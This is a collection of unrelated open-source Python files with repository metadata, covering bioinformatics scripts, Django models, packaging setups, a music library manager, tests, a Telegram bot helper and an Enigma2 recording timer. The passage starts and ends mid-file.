e = result.descriptions[0].e
if debug:
print "Blast match: ",hit
print "E-value: ",e
hitL = hit.split()
hitID = hitL[0]
t = [n for n in hitL if '..' in n]
hitInfo = t[0]
num1,num2 = hitInfo.split('..')
num2 = num2[:num2.find('(')]
num1,num2 = int(num1),int(num2)
strand = hitInfo[hitInfo.find('('):]
# Determine the direction, relative location, and position of the gene
direction = getDirection(hitInfo)
termUpper,termLower = getRelativeLocation(genomePath)
pos = getLocation(num1,termUpper,termLower)
# TODO
# Integrate warning for multiple hits
return num1,direction,pos,hit,e,''
def SearchGenome(queryFile,genomeName,debug):
from Bio import SeqIO
genomePath = 'Files/genome/'+genomeName+'/'+genomeName
genome = openGenome(genomePath)
high,low = getRelativeLocation(genomePath)
gene = SeqIO.read(open(queryFile),'fasta')
geneStr = str(gene.seq)
geneComp = str(gene.seq.reverse_complement())
count = 0
if geneStr in genome:
direction = 'forward'
n = genome.find(geneStr)
pos = getLocation(n,high,low)
count += genome.count(geneStr)
elif geneComp in genome:
direction = 'reverse'
n = genome.find(geneComp)
pos = getLocation(n,high,low)
count += genome.count(geneComp)
else:
return 0,0,'Ambiguous','No Match','N/A',''
# If the gene sequence is present more than once, issue a warning
bWarn = 'Warning: Gene sequence detected multiple times in genome'
return n,direction,pos,'No BLAST data','No BLAST data',bWarn
def getRelativeLocation(genomePath):
l,t = getTermRegion(genomePath+'.txt')
buff = 0.05 * l
high = t + buff
low = t - buff
return high,low
def getTermRegion(path):
fd = open(path)
info = fd.read()
l,t = info.split('\n')
l,t = int(l),int(t)
return l,t
def getDirection(line):
if '(+)' in line:
d = 'forward'
elif '(-)' in line:
d = 'reverse'
return d
def getLocation(num,high,low):
if num < low:
p = 'Early'
elif num > high:
p = 'Late'
else:
p = 'Ambiguous'
return p
def openGenome(gpath):
fd = open(gpath+'.fasta')
g = fd.read()
g = g.replace('\n','')
return g
|
gmoyerbrailean/PyRec
|
Files/BLASTing.py
|
Python
|
gpl-2.0
| 5,396
|
from django.db import models
class Tip(models.Model):
text = models.TextField(max_length=1000)
date = models.DateField(auto_now_add=True)
class Meta:
ordering = ['-date']
def __unicode__(self):
return '%s ' % (self.text)
class CurrentTip(models.Model):
index = models.IntegerField(max_length=4,default=0)
def __unicode__(self):
return '%s ' % (self.index)
|
videntity/tweatwell
|
apps/tips/models.py
|
Python
|
gpl-2.0
| 440
|
from setuptools import setup
from glob import glob
from WebPlayer2LocalPlayer import __version__
APP = ['WebPlayer2LocalPlayer.py']
DATA_FILES = [
('images', glob('images/*.png')),
]
OPTIONS = {
'argv_emulation': True,
'includes': [
'sip',
'PyQt5', 'PyQt5.QtGui', 'PyQt5.QtPrintSupport',
'PyQt5.QtCore', 'PyQt5.QtWebKitWidgets',
'PyQt5.QtWidgets', 'PyQt5.QtNetwork', 'PyQt5.QtWebKit',
],
'semi_standalone': 'False',
'compressed': True,
"optimize": 2,
"iconfile": 'images/app_icon.icns',
"qt_plugins": ["imageformats", "platforms"],
"plist": dict(
LSMinimumSystemVersion='10.8.0',
LSEnvironment=dict(
PATH='./../Resources:/usr/local/bin:/usr/bin:/bin'
)
)
}
setup(
name="WP2LP",
version=__version__,
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
|
gotlium/WebPlayer2LocalPlayer
|
setup.py
|
Python
|
gpl-2.0
| 929
|
from setuptools import setup
import os.path
setup(
name='State Fragility',
version='1',
py_modules=['state_fragility'],
data_files=[('', [
"./state_fragility.db"
])]
)
|
RealTimeWeb/datasets
|
datasets/python/state_fragility/setup.py
|
Python
|
gpl-2.0
| 198
|
import fsui
from fswidgets.widget import Widget
from launcher.i18n import gettext
from launcher.option import Option
from launcher.settings.settings_page import SettingsPage
from system.prefs.components.notworking import PrefsNotWorkingWarningPanel
class AudioSettingsPage(SettingsPage):
def __init__(self, parent: Widget) -> None:
super().__init__(parent)
PrefsNotWorkingWarningPanel(parent=self)
self.layout.add_spacer(20)
icon = fsui.Icon("audio-settings", "pkg:workspace")
gettext("Audio Settings")
title = gettext("Audio")
subtitle = ""
self.add_header(icon, title, subtitle)
self.add_option("volume")
self.add_option("stereo_separation")
self.add_section(gettext("Floppy Drive Sound Emulation"))
self.add_option("floppy_drive_volume")
self.add_option(Option.FLOPPY_DRIVE_VOLUME_EMPTY)
self.add_section(gettext("Advanced Audio Options"))
self.add_option("audio_frequency")
self.add_option("audio_buffer_target_size")
|
FrodeSolheim/fs-uae-launcher
|
launcher/settings/audio_settings_page.py
|
Python
|
gpl-2.0
| 1,061
|
#! /usr/bin/env python
"""
edits mothur taxonomy summary file
transfers last name that is not "unclassified" or "uncultured" to "unclassified" or "uncultured" assignment
make sure that the file has default sorting (by rankID)
Copyright:
tax_summary_edit edits mothur taxonomy summary file
Copyright (C) 2016 William Brazelton
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
infilename = sys.argv[1]
outfilename = infilename + '.renamed.txt'
outfile = open(outfilename,'a')
infile = open(infilename)
for line in infile:
if "unclassified" in line:
columns = line.split('\t')
tax = columns[2]
newtax = tax + ' ' + lasttax
outfile.write(columns[0])
outfile.write('\t')
outfile.write(columns[1])
outfile.write('\t')
outfile.write(newtax)
for tab in columns[3:]:
outfile.write('\t')
outfile.write(tab)
elif "uncultured" in line:
columns = line.split('\t')
tax = columns[2]
newtax = tax + ' ' + lasttax
outfile.write(columns[0])
outfile.write('\t')
outfile.write(columns[1])
outfile.write('\t')
outfile.write(newtax)
for tab in columns[3:]:
outfile.write('\t')
outfile.write(tab)
else:
outfile.write(line)
columns = line.split('\t')
lasttax = columns[2]
infile.close()
outfile.close()
|
Brazelton-Lab/lab_scripts
|
16S/tax_summary_edit.py
|
Python
|
gpl-2.0
| 1,875
|
# Copyright 2006 Joe Wreschnig
# 2013 Nick Boultbee
# 2013,2014 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Base library classes.
These classes are the most basic library classes. As such they are the
least useful but most content-agnostic.
"""
import os
import shutil
import time
from gi.repository import GObject
from senf import fsn2text, fsnative
from quodlibet import _
from quodlibet.formats import MusicFile, AudioFileError, load_audio_files, \
dump_audio_files, SerializationError
from quodlibet.query import Query
from quodlibet.qltk.notif import Task
from quodlibet.util.atomic import atomic_save
from quodlibet.util.collection import Album
from quodlibet.util.collections import DictMixin
from quodlibet import util
from quodlibet import formats
from quodlibet.util.dprint import print_d, print_w
from quodlibet.util.path import unexpand, mkdir, normalize_path, ishidden, \
ismount
class Library(GObject.GObject, DictMixin):
"""A Library contains useful objects.
The only required method these objects support is a .key
attribute, but specific types of libraries may require more
advanced interfaces.
Every method which takes a sequence of items expects items to
implement __iter__, __len__ and __contains__.
Likewise the signals emit sequences which implement
__iter__, __len__ and __contains__ e.g. set(), list() or tuple().
WARNING: The library implements the dict interface with the exception
that iterating over it yields values and not keys.
"""
__gsignals__ = {
'changed': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'removed': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'added': (GObject.SignalFlags.RUN_LAST, None, (object,)),
}
librarian = None
dirty = False
def __init__(self, name=None):
super(Library, self).__init__()
self._contents = {}
self._name = name
if self.librarian is not None and name is not None:
self.librarian.register(self, name)
def destroy(self):
if self.librarian is not None and self._name is not None:
self.librarian._unregister(self, self._name)
def changed(self, items):
"""Alert other users that these items have changed.
This causes a 'changed' signal. If a librarian is available
this function will call its changed method instead, and all
libraries that librarian manages may fire a 'changed' signal.
The item list may be filtered to those items actually in the
library. If a librarian is available, it will handle the
filtering instead. That means if this method is delegated to
the librarian, this library's changed signal may not fire, but
another's might.
"""
if not items:
return
if self.librarian and self in self.librarian.libraries.values():
print_d("Changing %d items via librarian." % len(items), self)
self.librarian.changed(items)
else:
items = {item for item in items if item in self}
if not items:
return
print_d("Changing %d items directly." % len(items), self)
self._changed(items)
def _changed(self, items):
assert isinstance(items, set)
# Called by the changed method and Librarians.
if not items:
return
print_d("Changing %d items." % len(items), self)
self.dirty = True
self.emit('changed', items)
def __iter__(self):
"""Iterate over the items in the library."""
return iter(self._contents.values())
def iteritems(self):
return iter(self._contents.items())
def iterkeys(self):
return iter(self._contents.keys())
def itervalues(self):
return iter(self._contents.values())
def __len__(self):
"""The number of items in the library."""
return len(self._contents)
def __getitem__(self, key):
"""Find a item given its key."""
return self._contents[key]
def __contains__(self, item):
"""Check if a key or item is in the library."""
try:
return item in self._contents or item.key in self._contents
except AttributeError:
return False
def get_content(self):
"""All items including hidden ones for saving the library
(see FileLibrary with masked items)
"""
return list(self.values())
def keys(self):
return self._contents.keys()
def values(self):
return self._contents.values()
def _load_item(self, item):
"""Load (add) an item into this library"""
# Subclasses should override this if they want to check
# item validity; see `FileLibrary`.
print_d("Loading %r." % item.key, self)
self.dirty = True
self._contents[item.key] = item
def _load_init(self, items):
"""Load many items into the library (on start)"""
# Subclasses should override this if they want to check
# item validity; see `FileLibrary`.
content = self._contents
for item in items:
content[item.key] = item
def add(self, items):
"""Add items. This causes an 'added' signal.
Return the sequence of items actually added, filtering out items
already in the library.
"""
items = {item for item in items if item not in self}
if not items:
return items
print_d("Adding %d items." % len(items), self)
for item in items:
self._contents[item.key] = item
self.dirty = True
self.emit('added', items)
return items
def remove(self, items):
"""Remove items. This causes a 'removed' signal.
Return the sequence of items actually removed.
"""
items = {item for item in items if item in self}
if not items:
return items
print_d("Removing %d items." % len(items), self)
for item in items:
del(self._contents[item.key])
self.dirty = True
self.emit('removed', items)
return items
def _load_items(filename):
"""Load items from disk.
In case of an error returns default or an empty list.
"""
try:
with open(filename, "rb") as fp:
data = fp.read()
except EnvironmentError:
print_w("Couldn't load library file from: %r" % filename)
return []
try:
items = load_audio_files(data)
except SerializationError:
# there are too many ways this could fail
util.print_exc()
# move the broken file out of the way
try:
shutil.copy(filename, filename + ".not-valid")
except EnvironmentError:
util.print_exc()
return []
return items
class PicklingMixin(object):
"""A mixin to provide persistence of a library by pickling to disk"""
filename = None
def load(self, filename):
"""Load a library from a file, containing a picked list.
Loading does not cause added, changed, or removed signals.
"""
self.filename = filename
print_d("Loading contents of %r." % filename, self)
items = _load_items(filename)
# this loads all items without checking their validity, but makes
# sure that non-mounted items are masked
self._load_init(items)
print_d("Done loading contents of %r." % filename, self)
def save(self, filename=None):
"""Save the library to the given filename, or the default if `None`"""
if filename is None:
filename = self.filename
print_d("Saving contents to %r." % filename, self)
try:
dirname = os.path.dirname(filename)
mkdir(dirname)
with atomic_save(filename, "wb") as fileobj:
fileobj.write(dump_audio_files(self.get_content()))
except SerializationError:
# Can happen when we try to pickle while the library is being
# modified, like in the periodic 15min save.
# Ignore, as it should try again later or on program exit.
util.print_exc()
except EnvironmentError:
print_w("Couldn't save library to path: %r" % filename)
else:
self.dirty = False
class PicklingLibrary(Library, PicklingMixin):
"""A library that pickles its contents to disk"""
def __init__(self, name=None):
print_d("Using pickling persistence for library \"%s\"" % name)
PicklingMixin.__init__(self)
Library.__init__(self, name)
class AlbumLibrary(Library):
"""An AlbumLibrary listens to a SongLibrary and sorts its songs into
albums.
The library behaves like a dictionary: the keys are album_keys of
AudioFiles, the values are Album objects.
"""
def __init__(self, library):
self.librarian = None
print_d("Initializing Album Library to watch %r" % library._name)
super(AlbumLibrary, self).__init__(
"AlbumLibrary for %s" % library._name)
self._library = library
self._asig = library.connect('added', self.__added)
self._rsig = library.connect('removed', self.__removed)
self._csig = library.connect('changed', self.__changed)
self.__added(library, library.values(), signal=False)
def load(self):
# deprecated
pass
def destroy(self):
for sig in [self._asig, self._rsig, self._csig]:
self._library.disconnect(sig)
def _get(self, item):
return self._contents.get(item)
def __add(self, items):
changed = set()
new = set()
for song in items:
key = song.album_key
if key in self._contents:
changed.add(self._contents[key])
else:
album = Album(song)
self._contents[key] = album
new.add(album)
self._contents[key].songs.add(song)
changed -= new
return changed, new
def __added(self, library, items, signal=True):
changed, new = self.__add(items)
for album in changed:
album.finalize()
if signal:
if new:
self.emit('added', new)
if changed:
self.emit('changed', changed)
def __removed(self, library, items):
changed = set()
removed = set()
for song in items:
key = song.album_key
album = self._contents[key]
album.songs.remove(song)
changed.add(album)
if not album.songs:
removed.add(album)
del self._contents[key]
changed -= removed
for album in changed:
album.finalize()
if removed:
self.emit('removed', removed)
if changed:
self.emit('changed', changed)
def __changed(self, library, items):
"""Album keys could change between already existing ones.. so we
have to do it the hard way and search by id."""
print_d("Updating affected albums for %d items" % len(items))
changed = set()
removed = set()
to_add = []
for song in items:
# in case the key hasn't changed
key = song.album_key
if key in self._contents and song in self._contents[key].songs:
changed.add(self._contents[key])
else: # key changed.. look for it in each album
to_add.append(song)
for key, album in self._contents.items():
if song in album.songs:
album.songs.remove(song)
if not album.songs:
removed.add(album)
else:
changed.add(album)
break
# get new albums and changed ones because keys could have changed
add_changed, new = self.__add(to_add)
changed |= add_changed
# check if albums that were empty at some point are still empty
for album in removed:
if not album.songs:
del self._contents[album.key]
changed.discard(album)
for album in changed:
album.finalize()
if removed:
self.emit("removed", removed)
if changed:
self.emit("changed", changed)
if new:
self.emit("added", new)
class SongLibrary(PicklingLibrary):
"""A library for songs.
Items in this kind of library must support (roughly) the AudioFile
interface.
"""
def __init__(self, *args, **kwargs):
super(SongLibrary, self).__init__(*args, **kwargs)
@util.cached_property
def albums(self):
return AlbumLibrary(self)
def destroy(self):
super(SongLibrary, self).destroy()
if "albums" in self.__dict__:
self.albums.destroy()
def tag_values(self, tag):
"""Return a set of all values for the given tag."""
return {value for song in self.values()
for value in song.list(tag)}
def rename(self, song, newname, changed=None):
"""Rename a song.
This requires a special method because it can change the
song's key.
The 'changed' signal may fire for this library or the changed
song is added to the passed changed set().
If the song exists in multiple libraries you cannot use this
method. Instead, use the librarian.
"""
print_d("Renaming %r to %r" % (song.key, newname), self)
del(self._contents[song.key])
song.rename(newname)
self._contents[song.key] = song
if changed is not None:
print_d("%s: Delaying changed signal." % (type(self).__name__,))
changed.add(song)
else:
self.changed({song})
def query(self, text, sort=None, star=Query.STAR):
"""Query the library and return matching songs."""
if isinstance(text, bytes):
text = text.decode('utf-8')
songs = self.values()
if text != "":
songs = list(filter(Query(text, star).search, songs))
return songs
def iter_paths(root, exclude=[], skip_hidden=True):
"""yields paths contained in root (symlinks dereferenced)
Any path starting with any of the path parts included in exclude
are ignored (before and after dereferencing symlinks)
Directory symlinks are not followed (except root itself)
Args:
root (fsnative)
exclude (List[fsnative])
skip_hidden (bool): Ignore files which are hidden or where any
of the parent directories are hidden.
Yields:
fsnative: absolute dereferenced paths
"""
assert isinstance(root, fsnative)
assert all((isinstance(p, fsnative) for p in exclude))
assert os.path.abspath(root)
def skip(path):
if skip_hidden and ishidden(path):
return True
# FIXME: normalize paths..
return any((path.startswith(p) for p in exclude))
if skip_hidden and ishidden(root):
return
for path, dnames, fnames in os.walk(root):
if skip_hidden:
dnames[:] = list(filter(
lambda d: not ishidden(os.path.join(path, d)), dnames))
for filename in fnames:
fullfilename = os.path.join(path, filename)
if skip(fullfilename):
continue
fullfilename = os.path.realpath(fullfilename)
if skip(fullfilename):
continue
yield fullfilename
class FileLibrary(PicklingLibrary):
"""A library containing items on a local(-ish) filesystem.
These must support the valid, exists, mounted, and reload methods,
and have a mountpoint attribute.
"""
def __init__(self, name=None):
super(FileLibrary, self).__init__(name)
self._masked = {}
def _load_init(self, items):
"""Add many items to the library, check if the
mountpoints are available and mark items as masked if not.
Does not check if items are valid.
"""
mounts = {}
contents = self._contents
masked = self._masked
for item in items:
mountpoint = item.mountpoint
if mountpoint not in mounts:
is_mounted = ismount(mountpoint)
# In case mountpoint is mounted through autofs we need to
# access a sub path for it to mount
# https://github.com/quodlibet/quodlibet/issues/2146
if not is_mounted:
item.exists()
is_mounted = ismount(mountpoint)
mounts[mountpoint] = is_mounted
# at least one not mounted, make sure masked has an entry
if not is_mounted:
masked.setdefault(mountpoint, {})
if mounts[mountpoint]:
contents[item.key] = item
else:
masked[mountpoint][item.key] = item
def _load_item(self, item, force=False):
"""Add an item, or refresh it if it's already in the library.
No signals will be fired.
Return a tuple of booleans: (changed, removed)
"""
print_d("Loading %r." % item.key, self)
valid = item.valid()
# The item is fine; add it if it's not present.
if not force and valid:
print_d("%r is valid." % item.key, self)
self._contents[item.key] = item
return False, False
else:
# Either we should force a load, or the item is not okay.
# We're going to reload; this could change the key. So
# remove the item if it's currently in.
try:
del(self._contents[item.key])
except KeyError:
present = False
else:
present = True
# If the item still exists, reload it.
if item.exists():
try:
item.reload()
except AudioFileError:
print_d("Error reloading %r." % item.key, self)
util.print_exc()
return False, True
else:
print_d("Reloaded %r." % item.key, self)
self._contents[item.key] = item
return True, False
elif not item.mounted():
# We don't know if the item is okay or not, since
# it's not not mounted. If the item was present
# we need to mark it as removed.
print_d("Masking %r." % item.key, self)
self._masked.setdefault(item.mountpoint, {})
self._masked[item.mountpoint][item.key] = item
return False, present
else:
# The item doesn't exist at all anymore. Mark it as
# removed if it was present, otherwise nothing.
print_d("Ignoring (so removing) %r." % item.key, self)
return False, present
def reload(self, item, changed=None, removed=None):
"""Reload a song, possibly noting its status.
If sets are given, it assumes the caller will handle signals,
and only updates the sets. Otherwise, it handles signals
itself. It *always* handles library contents, so do not
try to remove (again) a song that appears in the removed set.
"""
was_changed, was_removed = self._load_item(item, force=True)
assert not (was_changed and was_removed)
if was_changed:
if changed is None:
self.emit('changed', {item})
else:
changed.add(item)
elif was_removed:
if removed is None:
self.emit('removed', {item})
else:
removed.add(item)
def rebuild(self, paths, force=False, exclude=[], cofuncid=None):
"""Reload or remove songs if they have changed or been deleted.
This generator rebuilds the library over the course of iteration.
Any paths given will be scanned for new files, using the 'scan'
method.
Only items present in the library when the rebuild is started
will be checked.
If this function is copooled, set "cofuncid" to enable pause/stop
buttons in the UI.
"""
print_d("Rebuilding, force is %s." % force, self)
task = Task(_("Library"), _("Checking mount points"))
if cofuncid:
task.copool(cofuncid)
for i, (point, items) in task.list(enumerate(self._masked.items())):
if ismount(point):
self._contents.update(items)
del(self._masked[point])
self.emit('added', list(items.values()))
yield True
task = Task(_("Library"), _("Scanning library"))
if cofuncid:
task.copool(cofuncid)
changed, removed = set(), set()
for i, (key, item) in task.list(enumerate(sorted(self.items()))):
if key in self._contents and force or not item.valid():
self.reload(item, changed, removed)
# These numbers are pretty empirical. We should yield more
# often than we emit signals; that way the main loop stays
# interactive and doesn't get bogged down in updates.
if len(changed) > 100:
self.emit('changed', changed)
changed = set()
if len(removed) > 100:
self.emit('removed', removed)
removed = set()
if len(changed) > 5 or i % 100 == 0:
yield True
print_d("Removing %d, changing %d." % (len(removed), len(changed)),
self)
if removed:
self.emit('removed', removed)
if changed:
self.emit('changed', changed)
for value in self.scan(paths, exclude, cofuncid):
yield value
def add_filename(self, filename, add=True):
"""Add a file based on its filename.
Subclasses must override this to open the file correctly.
"""
raise NotImplementedError
def contains_filename(self, filename):
"""Returns if a song for the passed filename is in the library.
Returns:
bool
"""
raise NotImplementedError
def scan(self, paths, exclude=[], cofuncid=None):
def need_yield(last_yield=[0]):
current = time.time()
if abs(current - last_yield[0]) > 0.015:
last_yield[0] = current
return True
return False
def need_added(last_added=[0]):
current = time.time()
if abs(current - last_added[0]) > 1.0:
last_added[0] = current
return True
return False
# first scan each path for new files
paths_to_load = []
for scan_path in paths:
print_d("Scanning %r." % scan_path)
desc = _("Scanning %s") % (fsn2text(unexpand(scan_path)))
with Task(_("Library"), desc) as task:
if cofuncid:
task.copool(cofuncid)
for real_path in iter_paths(scan_path, exclude=exclude):
if need_yield():
task.pulse()
yield
# skip unknown file extensions
if not formats.filter(real_path):
continue
# already loaded
if self.contains_filename(real_path):
continue
paths_to_load.append(real_path)
yield
# then (try to) load all new files
with Task(_("Library"), _("Loading files")) as task:
if cofuncid:
task.copool(cofuncid)
added = []
for real_path in task.gen(paths_to_load):
item = self.add_filename(real_path, False)
if item is not None:
added.append(item)
if len(added) > 100 or need_added():
self.add(added)
added = []
yield
if added and need_yield():
yield
if added:
self.add(added)
added = []
yield True
def get_content(self):
"""Return visible and masked items"""
items = list(self.values())
for masked in self._masked.values():
items.extend(masked.values())
# Item keys are often based on filenames, in which case
# sorting takes advantage of the filesystem cache when we
# reload/rescan the files.
items.sort(key=lambda item: item.key)
return items
def masked(self, item):
"""Return true if the item is in the library but masked."""
try:
point = item.mountpoint
except AttributeError:
# Checking a key.
for point in self._masked.values():
if item in point:
return True
else:
# Checking a full item.
return item in self._masked.get(point, {}).values()
def unmask(self, point):
print_d("Unmasking %r." % point, self)
items = self._masked.pop(point, {})
if items:
self.add(items.values())
def mask(self, point):
print_d("Masking %r." % point, self)
removed = {}
for item in self.values():
if item.mountpoint == point:
removed[item.key] = item
if removed:
self.remove(removed.values())
self._masked.setdefault(point, {}).update(removed)
@property
def masked_mount_points(self):
"""List of mount points that contain masked items"""
return list(self._masked.keys())
def get_masked(self, mount_point):
"""List of items for a mount point"""
return list(self._masked.get(mount_point, {}).values())
def remove_masked(self, mount_point):
"""Remove all songs for a masked point"""
self._masked.pop(mount_point, {})
class SongFileLibrary(SongLibrary, FileLibrary):
"""A library containing song files.
Pickles contents to disk as `FileLibrary`"""
def __init__(self, name=None):
print_d("Initializing SongFileLibrary \"%s\"." % name)
super(SongFileLibrary, self).__init__(name)
def contains_filename(self, filename):
key = normalize_path(filename, True)
return key in self._contents
def get_filename(self, filename):
key = normalize_path(filename, True)
return self._contents.get(key)
def add_filename(self, filename, add=True):
"""Add a song to the library based on filename.
If 'add' is true, the song will be added and the 'added' signal
may be fired.
Example (add=False):
load many songs and call Library.add(songs) to add all in one go.
The song is returned if it is in the library after this call.
Otherwise, None is returned.
"""
key = normalize_path(filename, True)
song = None
if key not in self._contents:
song = MusicFile(filename)
if song and add:
self.add([song])
else:
print_d("Already got file %r." % filename)
song = self._contents[key]
return song
|
ptitjes/quodlibet
|
quodlibet/library/libraries.py
|
Python
|
gpl-2.0
| 28,163
|
import pytest
from roam_tests import objects
from roam.infodock import FeatureCursor, NoFeature
layer = objects.newmemorylayer()
layer = objects.addfeaturestolayer(layer, 2)
features = layer.getFeatures()
featureone = next(features)
featuretwo = next(features)
@pytest.fixture
def cursor():
return FeatureCursor(layer=layer, features=[featureone, featuretwo])
def test_should_start_at_index_0(cursor):
assert cursor.index == 0
def test_next_should_move_index(cursor):
cursor.next()
assert cursor.index == 1
def test_next_should_wrap_to_start_when_on_last(cursor):
last = len(cursor.features) - 1
cursor.index = last
assert cursor.index == last
cursor.next()
assert cursor.index == 0
def test_back_should_wrap_to_end_when_on_first(cursor):
last = len(cursor.features) - 1
assert cursor.index == 0
cursor.back()
assert cursor.index == last
def test_should_return_feature_at_index(cursor):
assert cursor.feature.id() == featureone.id()
cursor.next()
assert cursor.feature.id() == featuretwo.id()
def test_should_raise_no_feature_on_invalid_index(cursor):
cursor.index = 99
with pytest.raises(NoFeature):
cursor.feature
|
DMS-Aus/Roam
|
src/roam_tests/test_featurecursor.py
|
Python
|
gpl-2.0
| 1,206
|
################################################################################
# new_users_saver funciton
################################################################################
def newusers(m):
dict_updater()
un = m.from_user.username
if un not in DBDIC:
uid = m.from_user.id
DBDIC[un] = [uid,0]
if hasattr(m, 'new_chat_participant'):
un = m.new_chat_participant.username
if un not in DBDIC:
uid = m.new_chat_participant.id
DBDIC[un] = [uid,0]
dict_saver()
################################################################################
# "newusers" saves new users in the dictionary
# (see dict_updater_saver.py for "dict_updater()" and "dict_saver()")
################################################################################
|
acasadoquijada/Telegram-bot-stuff
|
Stuff/new_users_saver.py
|
Python
|
gpl-2.0
| 825
|
# DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Frederic Baguelin <fba@digital-forensic.org>
__version__ = "${API_EVENT_VERSION}"
__all__ = ["libevents"]
|
halbbob/dff
|
api/events/__init__.py
|
Python
|
gpl-2.0
| 617
|
import os
from enigma import eEPGCache, getBestPlayableServiceReference, \
eServiceReference, iRecordableService, quitMainloop, eActionMap
from Components.config import config
from Components.UsageConfig import defaultMoviePath
from Components.TimerSanityCheck import TimerSanityCheck
from Screens.MessageBox import MessageBox
import Screens.Standby
from Tools import Directories, Notifications, ASCIItranslit, Trashcan
from Tools.XMLTools import stringToXML
import timer
import xml.etree.cElementTree
import NavigationInstance
from ServiceReference import ServiceReference
from time import localtime, strftime, ctime, time
from bisect import insort
from sys import maxint
# ok, for descriptions etc we have:
# service reference (to get the service name)
# name (title)
# description (description)
# event data (ONLY for time adjustments etc.)
# parses an event, and gives out a (begin, end, name, duration, eit)-tuple.
# begin and end will be corrected
def parseEvent(ev, description = True):
if description:
name = ev.getEventName()
description = ev.getShortDescription()
if description == "":
description = ev.getExtendedDescription()
else:
name = ""
description = ""
begin = ev.getBeginTime()
end = begin + ev.getDuration()
eit = ev.getEventId()
begin -= config.recording.margin_before.value * 60
end += config.recording.margin_after.value * 60
return (begin, end, name, description, eit)
class AFTEREVENT:
NONE = 0
STANDBY = 1
DEEPSTANDBY = 2
AUTO = 3
def findSafeRecordPath(dirname):
if not dirname:
return None
from Components import Harddisk
dirname = os.path.realpath(dirname)
mountpoint = Harddisk.findMountPoint(dirname)
if mountpoint in ('/', '/media'):
print '[RecordTimer] media is not mounted:', dirname
return None
if not os.path.isdir(dirname):
try:
os.makedirs(dirname)
except Exception, ex:
print '[RecordTimer] Failed to create dir "%s":' % dirname, ex
return None
return dirname
def chechForRecordings():
if NavigationInstance.instance.getRecordings():
return True
rec_time = NavigationInstance.instance.RecordTimer.getNextTimerTime()
return rec_time > 0 and (rec_time - time()) < 360
# please do not translate log messages
class RecordTimerEntry(timer.TimerEntry, object):
######### the following static methods and members are only in use when the box is in (soft) standby
wasInStandby = False
wasInDeepStandby = False
receiveRecordEvents = False
@staticmethod
def keypress(key=None, flag=1):
if flag and (RecordTimerEntry.wasInStandby or RecordTimerEntry.wasInDeepStandby):
RecordTimerEntry.wasInStandby = False
RecordTimerEntry.wasInDeepStandby = False
eActionMap.getInstance().unbindAction('', RecordTimerEntry.keypress)
@staticmethod
def setWasInDeepStandby():
RecordTimerEntry.wasInDeepStandby = True
eActionMap.getInstance().bindAction('', -maxint - 1, RecordTimerEntry.keypress)
@staticmethod
def setWasInStandby():
if not RecordTimerEntry.wasInStandby:
if not RecordTimerEntry.wasInDeepStandby:
eActionMap.getInstance().bindAction('', -maxint - 1, RecordTimerEntry.keypress)
RecordTimerEntry.wasInDeepStandby = False
RecordTimerEntry.wasInStandby = True
@staticmethod
def shutdown():
quitMainloop(1)
@staticmethod
def staticGotRecordEvent(recservice, event):
if event == iRecordableService.evEnd:
print "RecordTimer.staticGotRecordEvent(iRecordableService.evEnd)"
if not chechForRecordings():
print "No recordings busy of sceduled within 6 minutes so shutdown"
RecordTimerEntry.shutdown() # immediate shutdown
elif event == iRecordableService.evStart:
print "RecordTimer.staticGotRecordEvent(iRecordableService.evStart)"
@staticmethod
def stopTryQuitMainloop():
print "RecordTimer.stopTryQuitMainloop"
NavigationInstance.instance.record_event.remove(RecordTimerEntry.staticGotRecordEvent)
RecordTimerEntry.receiveRecordEvents = False
@staticmethod
def TryQuitMainloop():
if not RecordTimerEntry.receiveRecordEvents and Screens.Standby.inStandby:
print "RecordTimer.TryQuitMainloop"
NavigationInstance.instance.record_event.append(RecordTimerEntry.staticGotRecordEvent)
RecordTimerEntry.receiveRecordEvents = True
# send fake event.. to check if another recordings are running or
# other timers start in a few seconds
RecordTimerEntry.staticGotRecordEvent(None, iRecordableService.evEnd)
#################################################################
def __init__(self, serviceref, begin, end, name, description, eit, disabled = False, justplay = False, afterEvent = AFTEREVENT.AUTO, checkOldTimers = False, dirname = None, tags = None, descramble = True, record_ecm = False, always_zap = False):
timer.TimerEntry.__init__(self, int(begin), int(end))
if checkOldTimers == True:
if self.begin < time() - 1209600:
self.begin = int(time())
if self.end < self.begin:
self.end = self.begin
assert isinstance(serviceref, ServiceReference)
if serviceref.isRecordable():
self.service_ref = serviceref
else:
self.service_ref = ServiceReference(None)
self.eit = eit
self.dontSave = False
self.name = name
self.description = description
self.disabled = disabled
self.timer = None
self.__record_service = None
self.start_prepare = 0
self.justplay = justplay
self.always_zap = always_zap
self.afterEvent = afterEvent
self.dirname = dirname
self.dirnameHadToFallback = False
self.autoincrease = False
self.autoincreasetime = 3600 * 24 # 1 day
self.tags = tags or []
self.descramble = descramble
self.record_ecm = record_ecm
self.log_entries = []
self.resetState()
def __repr__(self):
return "RecordTimerEntry(name=%s, begin=%s, serviceref=%s, justplay=%s)" % (self.name, ctime(self.begin), self.service_ref, self.justplay)
def log(self, code, msg):
self.log_entries.append((int(time()), code, msg))
print "[TIMER]", msg
def calculateFilename(self):
service_name = self.service_ref.getServiceName()
begin_date = strftime("%Y%m%d %H%M", localtime(self.begin))
print "begin_date: ", begin_date
print "service_name: ", service_name
print "name:", self.name
print "description: ", self.description
filename = begin_date + " - " + service_name
if self.name:
if config.recording.filename_composition.value == "short":
filename = strftime("%Y%m%d", localtime(self.begin)) + " - " + self.name
elif config.recording.filename_composition.value == "long":
